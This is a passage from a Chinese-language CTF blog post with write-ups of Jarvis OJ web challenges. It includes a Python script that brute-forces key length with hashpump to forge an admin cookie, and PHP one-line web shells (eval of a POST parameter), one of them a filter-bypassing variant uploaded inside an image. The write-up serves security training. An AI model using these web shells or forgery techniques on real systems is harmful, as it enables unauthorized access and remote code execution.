flag!!&lt;/h3&gt;<span class="string">";</span></span><br><span class="line"><span class="string">		&#125;</span></span><br><span class="line"><span class="string">	?&gt;</span></span><br><span class="line"><span class="string">	</span></span><br><span class="line"><span class="string">&lt;/body&gt;</span></span><br><span class="line"><span class="string">&lt;/html&gt;</span></span><br></pre></td></tr></table></figure>
<p>加密内容和hash值可控,典型的<a href="/2020/02/19/HLEA/">hash长度扩展攻击</a></p>
<p>由于长度未知,需要我们编写脚本爆破<br>其中有一点,题目要求满足<code>unserialize($_COOKIE[&quot;role&quot;])===&quot;admin&quot;</code>这个条件<br>由于php反序列化时会忽略第一个可序列化后对象之后的字符串,所以我们只要在hash长度扩展攻击时添加<code>admin的序列值</code>即可</p>
<p>payload</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://web.jarvisoj.com:32778/"</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">post</span><span class="params">(role,hsh,i)</span>:</span></span><br><span class="line">    cookie  = &#123;<span class="string">'role'</span>:role,<span class="string">'hsh'</span>:hsh&#125;</span><br><span class="line">    r =requests.get(url,cookies=cookie)</span><br><span class="line">    print(<span class="string">'长度为'</span>+str(i)+<span class="string">'爆破:'</span>)</span><br><span class="line">    print(r.text)</span><br><span class="line">    <span class="keyword">return</span></span><br><span class="line"></span><br><span class="line">cmd = <span class="string">"hashpump -s 3a4727d57463f122833d9e732f94e4e0 -d ';\"tseug\":5:s' -k &#123;&#125; -a ';\"nimda\":5:s'"</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">60</span>):</span><br><span class="line">    cmd1 = cmd.format(str(i))</span><br><span class="line">    res = os.popen(cmd1).readlines()</span><br><span class="line">    hsh = res[<span class="number">0</span>][:<span class="number">-1</span>]</span><br><span class="line">    role = res[<span class="number">1</span>][:<span class="number">-1</span>]</span><br><span class="line">    <span class="comment"># 对role进行反置并进行url编码</span></span><br><span class="line">    t1,t2,t3 = role[:<span class="number">12</span>],role[<span class="number">12</span>:<span class="number">-12</span>],role[<span class="number">-12</span>:]</span><br><span class="line">    t2 = t2.split(<span class="string">'\\x'</span>)</span><br><span class="line">    t2 = t2[::<span class="number">-1</span>]</span><br><span class="line">    t2 = <span class="string">'%'</span>.join(t2)</span><br><span class="line">    t2 = <span class="string">'%'</span> + t2[:<span class="number">-1</span>]</span><br><span class="line">    role = t3[::<span class="number">-1</span>]+t2+t1[::<span class="number">-1</span>]</span><br><span class="line">    role = role.replace(<span class="string">';'</span>,<span class="string">'%3b'</span>)</span><br><span class="line">    post(role,hsh,i)</span><br></pre></td></tr></table></figure>
<h2 id="Easy-Gallery"><a href="#Easy-Gallery" class="headerlink" title="Easy Gallery"></a>Easy Gallery</h2><p>看见url第一眼感觉就是存在文件包含<br>尝试php://filter泄露源码,提示<code>Cross domain forbidden!</code>,(我这也没跨站啊)<br>猜测检测过滤<code>//</code>,所以源码是看不到了.<br>但根据url我们可以猜测<code>?page=view</code>包含<code>view.php</code><br>可能是在后面直接添加<code>.php</code>访问,这样我们就可以利用<code>%00截断</code>访问一些其他页面<br>还有可能是利用键值对映射,如<code>&#39;view&#39;=&gt;&#39;view.php&#39;</code>,那这里就没有办法利用了</p>
<p>继续看上传页面,尝试上传祖传jpg图片马(jpg图片掺杂<code>&lt;?php @eval($_POST[&#39;pass&#39;]);?&gt;</code>),上传成功<br>尝试访问,可以访问.show界面好像没有什么可以利用的<br>重新转战url,尝试<code>%00截断</code>,能够访问,但是报错<code>You should not do this!</code><br>应该是一句话木马被检测到了<br>尝试另外两种一句话<br><code>&lt;?=@eval($_POST[&#39;pass&#39;]);?&gt;</code><br><code>&lt;script language=&quot;php&quot;&gt;eval($_POST[&#39;pass&#39;]);&lt;/script&gt;</code><br>第二种能够绕过,直接得到结果<br><img src="//desperadoccy.github.io/2020/02/15/jarvis/15.png" alt="test"></p>

      
    </div>
    
    
    

  <div>
      
        
      
  </div>
  
    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
            <a href="/tags/web/" rel="tag"># web</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/02/10/SSTI2/" rel="next" title="SSTI进阶">
                <i class="fa fa-chevron-left"></i> SSTI进阶
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/02/18/sqli-script/" rel="prev" title="sql注入盲注脚本">
                sql注入盲注脚本 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/favicon.ico" alt="desperadoccy">
            
              <p class="site-author-name" itemprop="name">desperadoccy</p>
              <p class="site-description motion-element" itemprop="description">desperado个人博客，一个热衷安全的软工狗。</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">57</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">22</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">28</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/desperadoccy" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:desperado@nuaa.edu.cn" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#PORT51"><span class="nav-number">1.</span> <span class="nav-text">PORT51</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#LOCALHOST"><span class="nav-number">2.</span> <span class="nav-text">LOCALHOST</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Login"><span class="nav-number">3.</span> <span class="nav-text">Login</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#神盾局的秘密"><span class="nav-number">4.</span> <span class="nav-text">神盾局的秘密</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#In-A-Mess"><span class="nav-number">5.</span> <span class="nav-text">In A Mess</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RE"><span class="nav-number">6.</span> <span class="nav-text">RE?</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PHPINFO"><span class="nav-number">7.</span> <span class="nav-text">PHPINFO</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#api调用"><span class="nav-number">8.</span> <span class="nav-text">api调用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#WEB"><span class="nav-number">9.</span> <span class="nav-text">WEB?</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#babyphp"><span class="nav-number">10.</span> <span class="nav-text">babyphp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#admin"><span class="nav-number">11.</span> <span class="nav-text">admin</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#inject"><span class="nav-number">12.</span> <span class="nav-text">inject</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Simple-Injection"><span class="nav-number">13.</span> <span class="nav-text">Simple Injection</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Chopper"><span class="nav-number">14.</span> <span class="nav-text">Chopper</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#flag在管理员手中"><span class="nav-number">15.</span> <span class="nav-text">flag在管理员手中</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Easy-Gallery"><span class="nav-number">16.</span> <span class="nav-text">Easy Gallery</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2019 &mdash; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">desperadoccy</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>






        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i> 访问人数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i> 总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/kesyoban.model.json"},"display":{"position":"left","width":300,"height":400},"mobile":{"show":false},"log":false});</script></body>
</html>
